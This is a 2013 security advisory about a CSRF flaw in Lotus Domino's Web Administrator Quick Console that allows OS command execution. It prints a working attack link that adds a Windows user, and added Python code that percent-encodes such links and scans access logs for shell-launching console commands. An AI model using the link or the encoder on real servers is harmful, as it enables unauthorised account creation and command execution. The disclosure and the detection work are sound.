
Lotus Domino Web Administrator – Cross Site Command Execution

2013-04-21 10:57

Description

Lotus Domino is vulnerable to a cross-site request forgery (CSRF) attack that can be used for OS command execution through the Quick Console of the webadmin.nsf database (the Domino Web Administrator).

Lotus Domino is an IBM server product that provides enterprise-grade e-mail, collaboration capabilities and a custom application platform. Domino began life as Lotus Notes Server, the server component of Lotus Development Corporation's client-server messaging technology. It can be used as an application server for Lotus Notes applications and/or as a web server. It also has a built-in database system that uses the NSF format.

Details

The server is vulnerable to cross-site request forgery: the Quick Console agent in webadmin.nsf is driven by a plain GET request whose only per-request value is a cache-busting timestamp, not an unpredictable anti-CSRF token, so a browser that is logged in to the Web Administrator attaches the administrator's credentials to any such request automatically, whoever crafted it.

One way to exploit this is cross-site command execution.

By sending a specially crafted link to the administrator, an attacker can execute any command on the operating system where Lotus Domino is installed, with the privileges of the Domino server process, and retrieve the output of the executed command.

Example:

An attacker can give the administrator the following link (shown unencoded for readability; when placed in a page or e-mail, the spaces, > and \ characters should be percent-encoded):

URL=http://server/webadmin.nsf/agReadConsoleData$UserL2?OpenAgent&Mode=QuickConsole&Command=load cmd /c net user hack hack123 /add > C:\Lotus\Domino\data\domino\html\download\filesets\netuser.png&1271932906681


If the administrator follows this link while logged in to the Web Administrator, the Domino console command "load cmd /c net user hack hack123 /add ..." runs on the server and adds a new local Windows user, provided the account the Domino service runs under is allowed to create users. The trailing 1271932906681 is only a cache-busting timestamp and plays no part in the attack.

The attacker can then confirm that the command ran by reading its redirected output, which was written under Domino's HTML document root (C:\Lotus\Domino\data\domino\html) and is therefore reachable over HTTP:
http://server/download/filesets/netuser.png
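The two practical pieces a defender or tester wants from the advisory above are a correctly percent-encoded form of the link (the page shows it raw) and a way to find such Quick Console commands in the Domino web-server log after the fact. The following is an added example, not code from the original advisory or from IBM: it builds the agReadConsoleData URL from its parts, extracts the Command parameter back out of a URL, and scans access-log lines for Quick Console commands, flagging the ones that launch an OS shell. The log layout (client, ident, user, timestamp, request line, status, size) and the sample lines are constructed for this example, and the shell-keyword heuristic is an assumption, not a Domino feature.

```python
"""Added example: encode the Quick Console CSRF link and hunt for its use in logs."""
import re
from urllib.parse import parse_qs, quote, urlencode, urlsplit

# Agent path from the advisory (webadmin.nsf Quick Console).
AGENT_PATH = "/webadmin.nsf/agReadConsoleData$UserL2"

# The console command from the advisory's example link.
ATTACK_COMMAND = (r"load cmd /c net user hack hack123 /add "
                  r"> C:\Lotus\Domino\data\domino\html\download\filesets\netuser.png")


def build_quick_console_url(host, command, cache_buster="1271932906681"):
    """Return the agReadConsoleData URL that runs `command` in the Quick Console.

    quote() with safe="/" turns ' ' into %20, '>' into %3E, ':' into %3A and
    '\\' into %5C, so the link survives a browser and Domino's query parser
    instead of being shown raw as in the advisory.
    """
    query = urlencode({"Mode": "QuickConsole", "Command": command},
                      safe="/", quote_via=quote)
    return f"http://{host}{AGENT_PATH}?OpenAgent&{query}&{cache_buster}"


def extract_command(request_target):
    """Return the decoded Quick Console command carried by a URL or request
    target, or None when the target is not a QuickConsole agent call."""
    parts = urlsplit(request_target)
    if not parts.path.lower().startswith("/webadmin.nsf/agreadconsoledata"):
        return None
    qs = parse_qs(parts.query)           # percent-decodes; drops bare tokens
    if qs.get("Mode", [""])[0] != "QuickConsole" or "Command" not in qs:
        return None
    return qs["Command"][0]


# Assumed common access-log layout: client ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Heuristic (assumption): a console command that loads a shell or interpreter
# is an OS command, not a Domino task. Extend for the platform in use.
SHELL_RE = re.compile(r'\b(cmd(?:\.exe)?|command\.com|powershell(?:\.exe)?|sh|bash)\b',
                      re.IGNORECASE)


def quick_console_commands(log_lines):
    """Scan log lines and return one record per Quick Console command seen.

    Legitimate administrators issue these same requests from the Web
    Administrator UI, so every hit is reported and `spawns_shell` marks the
    ones that warrant a look regardless of who appears to have sent them.
    """
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        command = extract_command(m["target"])
        if command is None:
            continue
        findings.append({
            "ip": m["ip"],
            "user": m["user"],
            "time": m["ts"],
            "status": m["status"],
            "command": command,
            "spawns_shell": bool(SHELL_RE.search(command)),
        })
    return findings


# Constructed sample log: a routine console query, the forged request from the
# advisory (as the browser would send it, percent-encoded), the attacker's
# later fetch of the output file, and an unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - admin [21/Apr/2013:10:57:01 +0400] "GET /webadmin.nsf/agReadConsoleData$UserL2'
    '?OpenAgent&Mode=QuickConsole&Command=show%20tasks&1271932906680 HTTP/1.1" 200 512',
    '10.0.0.5 - admin [21/Apr/2013:10:58:17 +0400] "GET /webadmin.nsf/agReadConsoleData$UserL2'
    '?OpenAgent&Mode=QuickConsole&Command=load%20cmd%20/c%20net%20user%20hack%20hack123%20/add'
    '%20%3E%20C%3A%5CLotus%5CDomino%5Cdata%5Cdomino%5Chtml%5Cdownload%5Cfilesets%5Cnetuser.png'
    '&1271932906681 HTTP/1.1" 200 0',
    '203.0.113.7 - - [21/Apr/2013:10:58:20 +0400] "GET /download/filesets/netuser.png HTTP/1.1" 200 31',
    '10.0.0.9 - jsmith [21/Apr/2013:10:59:02 +0400] "GET /names.nsf?Open HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    print(build_quick_console_url("server", ATTACK_COMMAND))
    for hit in quick_console_commands(SAMPLE_LOG):
        flag = "SHELL" if hit["spawns_shell"] else "ok   "
        print(f'{flag} {hit["time"]} {hit["ip"]} {hit["user"]}: {hit["command"]}')
```

Run it against a real Domino access log by reading the file into `quick_console_commands`; a hit from an administrator's own address is exactly what a successful CSRF looks like, so correlate the timestamp with the administrator's browsing rather than trusting the source IP, and follow up on the fetch of the redirected output file from an unexpected client.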